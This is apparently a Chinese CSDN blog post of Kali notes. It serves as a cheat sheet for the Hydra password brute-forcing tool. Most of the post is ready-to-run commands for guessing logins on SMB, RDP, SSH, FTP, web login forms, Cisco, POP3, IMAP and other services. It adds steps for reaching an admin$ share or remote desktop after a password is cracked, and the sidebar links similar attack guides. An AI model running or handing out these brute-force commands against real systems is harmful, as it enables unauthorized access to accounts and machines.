hydra 爆破

最新推荐文章于 2024-05-17 11:30:00 发布
最新推荐文章于 2024-05-17 11:30:00 发布
阅读量574 收藏
点赞数 3
分类专栏: kali笔记 文章标签: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dqd66/article/details/127355057
版权

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]
参数详解:
hydra 爆破smb 445
    hydra -l administrator -P passwd.txt smb://192.168.132.1 -v
    爆破成功后 在 文件夹路径的地方输入   \\192.168.132.1\admin$     然后登录
hydra 爆破3389
    hydra ip rdp -l administrator -P pass.txt -V 
在linux里面登录    rdesktop 192.168.1.1    直接登录

-R   根据上一次进度继续破解
-S   使用SSL协议连接
-s   指定端口
-l   指定用户名
-L   指定用户名字典(文件)
-p   指定密码破解
-P   指定密码字典(文件)
-e   空密码探测和指定用户密码探测(ns)-M   <FILE>指定目标列表文件一行一条-f   在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-C   用户名可以用:分割(username:password)可以代替-l username -p password
-o   <FILE>输出文件
-t   指定多线程数量,默认为16个线程-w   TIME 设置最大超时的时间,单位秒,默认是30s
-vV  显示详细过程
server     目标IP
service    指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)
爆破 ssh:22 端口命令:

hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh
爆破 Ftp:21 端口命令(指定用户名为root):

hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp
get方式提交,破解web登录(指定用户名为admin):

hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交,破解web登录:

hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。

破解https:

hydra -m /index.php -l admin -P password.txt 192.168.0.132 https
破解teamspeak:

hydra -l admin -P passworrd.txt -s 端口号 -vV 192.168.0.132 teamspeak
破解cisco:

hydra -P password.txt 192.168.0.132 cisco
hydra -m cloud -P password.txt 192.168.0.132 cisco-enable
破解smb:

hydra -l administrator -P password.txt 192.168.0.132 smb
破解pop3:

hydra -l root -P password.txt my.pop3.mail pop3
破解rdp(3389端口):

hydra -l administrator -P password.txt -V 192.168.0.132 rdp
破解http-proxy:

hydra -l admin -P passwprd.txt http-proxy://192.168.0.132
破解imap:

hydra -L user.txt -p secret 192.168.0.132 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

 

@pon
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
8.使用hydra对端口进行爆破
weixin_30483697的博客
11-18 1802
如果对开启端口的服务不清楚,请看我之前写的文章:https://www.cnblogs.com/bmjoker/p/8833316.html 2018,网站的防护(sql,xss...)的安全保护也已经上升了一个等级,但是由于管理员的安全意识薄弱,网站弱口令漏洞依然猖獗,不信可以看补天的漏洞提交记录,弱口令依然是漏洞中的佼佼者,当然弱口令并不仅限于网站的后台登陆弱口令,还有端口,比如 Ftp:2...
hydra暴力破解
pan_bok的博客
11-21 390
Hydra 可以根据使用者指定的用户字名典文件、密码字典文件、目标IP列表来暴力破解目标系统登录用户名和密码。并且其支持多种协议以及并发连接! csdn链接 : https://blog.csdn.net/qq_37598011/article/details/89156261 安装 GitHub项目地址:https://github.com/vanhauser-thc/t...
hydra强大的爆破工具,支持多种协议
05-05
hydra支持POP3,SMB,RDP、SSH,FTP,POP3,Telnet,MYSQL等协议的爆破
应用协议安全:Hydra 端口爆破工具.(九头蛇)
最新发布
m0_59598029的博客
05-17 1233
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
hydra(九头蛇)爆破常见端口
guanjian_ci的博客
05-11 5720
整理一下 hydra 端口爆破命令语法 目录: 简介 1. 21端口爆破命令 2. 22端口爆破命令 3. 1433端口爆破命令 4. 3306端口爆破命令 5. 3389端口爆破命令 6. smb服务爆破命令 7. imap服务爆破命令 总结 简介 hydra 也称九头蛇, 是著名黑客组织thc的一款开源的暴力密码破解工具,可以破解多种密码。 1. 21端口爆破命令 21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务, FTP服务主要是为
第六天 01-hydra工具windows远程桌面的密码爆破
qq_56414082的博客
01-02 7188
RDP是Windows的远程桌面协议。所占用的端口默认为3389,这个是可以修改的。
SSH端口爆破及其应急响应方案
m0_58540923的博客
07-26 2065
Secure Shell (安全外壳协议,简称SSH) 是一种加密的网络传输协议;用途:安全远程登录;可帮助我们在windows下去连接并操作linux服务器。常见的SSH客户端有putty、SSH Secure Shell、MobaXterm 、Xshell等;常用端口:22爆破时间、爆破用户、攻击者ip、攻击方式。
hydra 爆破工具
02-22
windows 版 hydra 爆破工具,仅供学习。
hydra密码爆破字典压缩后120M,password压缩前386M。
03-03
hydra密码爆破字典压缩后120M,压缩前386M。下的别人的,共享出来
Hydra 9.1【Windows版】(2020-08-2更新).rar
02-11
hydra爆破rdp:(前提是目标的远程连接可以访问) hydra -l Administrator -P password.txt rdp://192.168.1.111 hydra爆破mysql:(前提是目标的mysql可远程访问) hydra -l root -P password.txt 192.168.1.111 mysql ...
ssh爆破工具hydra.zip
04-27
ssh爆破工具hydra.zip
Hydra密码爆破工具使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
Kali网络安全终极教程
07-05
1、本课程着重分享Kali Linux渗透测试从基础学习到实战操作教程!2、本课程致力于帮助学员学习、Kali Linux环境搭建、系统操作及其实战技巧!
hydra暴力破解ftp-telnet-mysql-ssh-http
WEB渗透测试 从入门到萌新
10-09 6498
使用此命令,会枚举出网站已经注册的用户名,枚举出用户名之后,就可以通过xmlrpc.php或者后台登录页面进行爆破,对应的防御手段就是禁用掉xmlrpc.php并对后台进行隐藏
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3630
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
Python 渗透测试:文件传输爆破( 21端口 )
网络安全领域___专研者.
05-21 2981
Python 开发学习的意义: (1)学习相关安全工具原理. (2)掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况. (3)在二次开发 Bypass,日常任务,批量测试利用等方面均有帮助.
端口爆破是什么意思/针对Web与系统端口层面的密码穷举爆破_小白信息安全知识点
程序员六七的博客
05-09 453
关于这篇文章本文适合刚刚接触的初学者进行学习 写本文即是对本人知识点的整理也是为了学习 (求各位大牛指出本文的不足和说错的地方) 文章内容相对来说有点长长长长
学“狂飙”的网络安全,做最强盛的打工人!!
Karka_的博客
03-18 143
*刚刚结课,就有学员找到了14K的薪资。**课程虽已结束,但我们的结业帮扶持续进行。束,但我们的结业帮扶持续进行。
hydra爆破postgresql
10-21
使用Hydra爆破PostgreSQL需要以下步骤: 1. 确认目标IP地址和端口号。 2. 准备用户名和密码字典文件。 3. 执行Hydra命令,指定协议为postgresql,设置目标IP地址和端口号,指定用户名字典文件和密码字典文件。 4. 等待Hydra执行完毕,查看结果。 以下是一个使用Hydra爆破PostgreSQL的命令示例: hydra -L user.txt -P pass.txt -f -vV -o result.txt postgresql://IP:port 其中,-L参数指定用户名字典文件,-P参数指定密码字典文件,-f参数指定在找到正确的用户名和密码后停止爆破,-vV参数指定输出详细信息,-o参数指定输出结果到文件result.txt中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@pon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值